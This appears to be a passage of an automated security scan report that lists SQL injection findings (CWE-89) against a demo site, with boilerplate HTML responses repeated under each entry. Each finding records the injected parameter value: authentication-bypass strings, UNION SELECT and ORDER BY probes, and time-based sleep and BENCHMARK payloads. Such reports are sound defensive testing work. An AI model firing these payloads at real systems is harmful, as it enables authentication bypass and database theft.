href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1112\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@ admin') or '1'='1deepfence.io\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1113\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #1114\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1115\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1116\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1117\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1 or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1118\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1119\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1120\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1121\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io') or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1122\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1123\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1124\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor pg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #1125\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or ('1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points 